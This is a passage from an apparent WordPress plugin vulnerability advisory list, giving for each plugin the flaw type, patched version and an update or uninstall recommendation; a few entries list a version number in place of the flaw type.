Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Product Table Lite

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Lean WP

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CallRail Phone Call Tracking

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 0.4.10
Recommended Action: Update to version 0.4.10, or a newer patched version

Plugin: Database Backup for WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting via backup_receipient Parameter
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Strong Testimonials

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Scribble Maps

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Re-attacher by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Insert Estimated Reading Time

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BSK Forms Blacklist

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘order’ and ‘orderby’
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Plugin: Videos sync PDF

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: XML Sitemap Generator for Google

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: AdPush

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.30
Recommended Action: Update to version 1.30, or a newer patched version

Plugin: miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn)

Vulnerability: Authenticated (Subscriber+) Privilege Escalation
Patched Version: 7.6.7
Recommended Action: Update to version 7.6.7, or a newer patched version

Plugin: Restrict Categories

Vulnerability: Reflected Cross-Site Scripting via rc-search
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.7
Recommended Action: Update to one of the following versions, or a newer patched version: 1.8.7, 1.9.10, 2.0.5, 2.1.11, 2.2.9, 2.3.7

Plugin: WP Google Maps Pro

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 8.1.12
Recommended Action: Update to version 8.1.12, or a newer patched version

Plugin: StagTools

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: ULeak Security & Monitoring Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Loco Translate

Vulnerability: Authenticated PHP Code Injection
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: Video Background

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.7.4
Recommended Action: Update to version 2.7.4, or a newer patched version

Plugin: WP Recipe Maker

Vulnerability: Directory Traversal
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Cross-Site Request Forgery to Plugin Channel Reset
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: A/B Test for WordPress

Vulnerability: Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Contact form 7 DB

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: ElasticPress

Vulnerability: Prototype Pollution
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Arbitrary File Upload
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: WP Docs

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 1.9.9
Recommended Action: Update to version 1.9.9, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: Abandoned Cart Recovery for WooCommerce

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.0.4.1
Recommended Action: Update to version 1.0.4.1, or a newer patched version

Plugin: AllWebMenus WordPress Menu Plugin

Vulnerability: Remote File Inclusion
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.8
Recommended Action: Update to version 3.8.8, or a newer patched version

Plugin: Medialist

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Total Security

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: LionScripts: IP Blocker Lite

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rencontre – Dating Site

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Memory Usage, Memory Limit, PHP and Server Memory Health Check and Provide Suggestions

Vulnerability: Cross-Site Scripting
Patched Version: 2.44
Recommended Action: Update to version 2.44, or a newer patched version

Plugin: OSD Subscribe

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: QuBot – Chatbot Builder with Templates

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Sliding Social Icons

Vulnerability: Cross-Site Request Forgery and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Futurio Extra

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: SureTriggers: All-in-One WordPress Automation

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.24
Recommended Action: Update to version 1.0.24, or a newer patched version

Plugin: Seriously Simple Stats

Vulnerability: Authenticated (Podcast manager+) SQL Injection via order_by
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Easy Appointments

Vulnerability: Cross-Site Request Forgery via multiple AJAX actions
Patched Version: 3.11.10
Recommended Action: Update to version 3.11.10, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: 1.2.997
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Coru LFMember

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mailjet Email Marketing

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 5.3.1
Recommended Action: Update to version 5.3.1, or a newer patched version

Plugin: stripshow

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Global Flash Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 0.15.2
Recommended Action: Update to version 0.15.2, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 5.2.5
Recommended Action: Update to version 5.2.5, or a newer patched version

Plugin: Sticky Menu & Sticky Header

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.21
Recommended Action: Update to version 2.21, or a newer patched version

Plugin: Dynamic Widgets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Minimum Purchase for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.47
Recommended Action: Update to version 1.1.47, or a newer patched version

Plugin: A2 Optimized WP – Turbocharge and secure your WordPress site

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: File Manager

Vulnerability: Unauthenticated Resource Access to Site Backups
Patched Version: 6.5
Recommended Action: Update to version 6.5, or a newer patched version

Plugin: MainWP Matomo Extension

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Spam Injection
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Captcha Bypass
Patched Version: 1.15.21
Recommended Action: Update to version 1.15.21, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 13.1.6
Recommended Action: Update to version 13.1.6, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.49
Recommended Action: Update to version 3.2.49, or a newer patched version

Plugin: Termly – GDPR/CCPA Cookie Consent Banner

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: Live Chat with Messenger Customer Chat

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: DMSGuestbook

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sermon Browser

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 0.45.16
Recommended Action: Update to version 0.45.16, or a newer patched version

Plugin: Album and Image Gallery plus Lightbox

Vulnerability: Missing Authorization
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Reflected Cross-Site Scripting via font-size
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: WP Frontend Profile

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.2.2
Recommended Action: Update to version 0.2.2, or a newer patched version

Plugin: Logo Carousel – Responsive Logo Slider, Logo Showcase, and Clients Logo Gallery

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Ship To eCourier

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Cimy User Manager

Vulnerability: Arbitrary File Read
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Magic Post Voice

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Syntax

Vulnerability: Remote Code Execution
Patched Version: 0.9.10
Recommended Action: Update to version 0.9.10, or a newer patched version

Plugin: Google Map

Vulnerability: SQL Injection
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Advanced Booking Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Gallery Metabox

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Subscribe

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.13
Recommended Action: Update to version 1.2.13, or a newer patched version

Plugin: Simple Portfolio Gallery

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: WP Hide Pages

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Support Board

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Recently Viewed Products

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HT Mega – Absolute Addons For Elementor

Vulnerability: Missing Authorization to Privilege Escalation
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: CodeBard's Patron Button and Widgets for Patreon

Vulnerability: Reflected Cross-Site Scripting via ‘site_account’
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Exquisite PayPal Donation

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Insecure Content Warning

Vulnerability: Remote Code Execution
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: 6.3.0
Recommended Action: Update to version 6.3.0, or a newer patched version

Plugin: Simple:Press Forum

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Forum Replies
Patched Version: 6.8.1
Recommended Action: Update to version 6.8.1, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Authenticated SQL Injection via Orderby
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: 2.6.7.6
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Advanced Schedule Posts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Manager

Vulnerability: Authenticated (Contributor+) PHAR Deserialization
Patched Version: 3.2.50
Recommended Action: Update to version 3.2.50, or a newer patched version

Plugin: NextCellent Gallery – NextGEN Legacy

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.9.18
Recommended Action: Update to version 1.9.18, or a newer patched version

Plugin: Email Artillery (MASS EMAIL)

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Elementor Addon Elements

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.12.8
Recommended Action: Update to version 1.12.8, or a newer patched version

Plugin: Export and Import Users and Customers

Vulnerability: Missing Authorization to Authenticated (Shop Manager) Arbitrary User Password Change
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Sensitive Information Disclosure
Patched Version: 5.2
Recommended Action: Update to version 5.2, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Authenticated (Subscriber+) Arbitrary Option Update
Patched Version: 5.5.2
Recommended Action: Update to version 5.5.2, or a newer patched version

Plugin: Crelly Slider

Vulnerability: SQL Injection
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Etsy Shop

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 7.11.35
Recommended Action: Update to version 7.11.35, or a newer patched version

Plugin: Powerplay Gallery

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Local File Inclusion
Patched Version: 3.8.12
Recommended Action: Update to version 3.8.12, or a newer patched version

Plugin: Easy Modal

Vulnerability: SQL Injection
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Table Generator

Vulnerability: Missing Authorization to Table Modification
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Page Ordering

Vulnerability: Open Redirect
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: GD Rating System

Vulnerability: Directory Traversal
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Download Monitor

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Go Pricing – WordPress Responsive Pricing Tables

Vulnerability: WordPress Responsive Pricing Tables <= 3.3.19
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: 404 Solution

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.35.0
Recommended Action: Update to version 2.35.0, or a newer patched version

Plugin: CPT Shortcode Generator

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Font Awesome

Vulnerability: API Token Exposure
Patched Version: 4.0.0-rc17
Recommended Action: Update to version 4.0.0-rc17, or a newer patched version

Plugin: Better WordPress reCAPTCHA (with no CAPTCHA reCAPTCHA)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Resim Ara

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Time Sheets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Stored Cross-Site Scripting via HTTP_HOST
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Complianz Premium – GDPR/CCPA Cookie Consent

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 6.4.7
Recommended Action: Update to version 6.4.7, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authorization Bypass
Patched Version: 2.5.5
Recommended Action: Update to version 2.5.5, or a newer patched version

Plugin: OOPSpam Anti-Spam

Vulnerability: Cross-Site Request Forgery via empty_ham_entries and empty_spam_entries
Patched Version: 1.1.45
Recommended Action: Update to version 1.1.45, or a newer patched version

Plugin: Stars Rating

Vulnerability: Denial of Service
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Seed Social

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Mail logging – WP Mail Catcher

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.0.0
Recommended Action: Update to version 2.6.0.0, or a newer patched version

Plugin: Popups – WordPress Popup

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Paid Memberships Pro CCBill Gateway

Vulnerability: Insufficient Authorization
Patched Version: 0.4
Recommended Action: Update to version 0.4, or a newer patched version

Plugin: SpiderVPlayer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Export WP Page to Static HTML/CSS

Vulnerability: Missing Authorization via Multiple AJAX Actions
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: StoryChief

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.0.31
Recommended Action: Update to version 1.0.31, or a newer patched version

Plugin: WOWRestro – Online Ordering System For WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: WordPress Popular Posts

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 5.3.3
Recommended Action: Update to version 5.3.3, or a newer patched version

Plugin: ActiveCampaign – Forms, Site Tracking, Live Chat

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.1.12
Recommended Action: Update to version 8.1.12, or a newer patched version

Plugin: Popup contact form

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FileBird – WordPress Media Library Folders & File Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Folder Import
Patched Version: 5.6.1
Recommended Action: Update to version 5.6.1, or a newer patched version

Plugin: Currency Converter Widget – Exchange Rates

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 2.0.66
Recommended Action: Update to version 2.0.66, or a newer patched version

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.1
Recommended Action: Update to version 9.1, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via list_id parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Royal Elementor Addons and Templates

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.76
Recommended Action: Update to version 1.3.76, or a newer patched version

Plugin: Patreon WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: BackupBuddy

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WatchTowerHQ

Vulnerability: Type Juggling to Authentication Bypass in check_ota
Patched Version: 3.6.17
Recommended Action: Update to version 3.6.17, or a newer patched version

Plugin: Launchpad – Coming Soon & Maintenance Mode Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YouTube Embed

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 5.2.2
Recommended Action: Update to version 5.2.2, or a newer patched version

Plugin: eShop

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.2.9
Recommended Action: Update to version 6.2.9, or a newer patched version

Plugin: Software License Manager

Vulnerability: Cross-Site Request Forgery leading to Arbitrary Domain Deletion
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: 3.3.0
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: My YouTube Channel

Vulnerability: Missing Authorization
Patched Version: 3.23.0
Recommended Action: Update to version 3.23.0, or a newer patched version

Plugin: WooCommerce Customers Manager

Vulnerability: Authenticated Account Creation and Privilege Escalation
Patched Version: 26.5
Recommended Action: Update to version 26.5, or a newer patched version

Plugin: Accordion

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.2.43
Recommended Action: Update to version 2.2.43, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Authenticated (Subscriber+) Order Modification
Patched Version: 5.6.1
Recommended Action: Update to version 5.6.1, or a newer patched version

Plugin: Copyright Proof

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mail On Update

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: MouseWheel Smooth Scroll

Vulnerability: Plugin’s Setting Update via Cross-Site Request Forgery
Patched Version: 5.7
Recommended Action: Update to version 5.7, or a newer patched version

Plugin: WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Twitter Friends Widget

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Request Forgery to Field Import and PHP Object Injection
Patched Version: 3.6.10
Recommended Action: Update to version 3.6.10, or a newer patched version

Plugin: Calendar Event Multi View

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 1.4.07
Recommended Action: Update to version 1.4.07, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘clear_uucss_logs’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.0.46
Recommended Action: Update to version 2.0.46, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.5
Recommended Action: Update to version 1.9.5, or a newer patched version

Plugin: Advanced Contact form 7 DB

Vulnerability: Authenticated Arbitrary File Deletion
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Uploadify

Vulnerability: Arbitrary File Upload
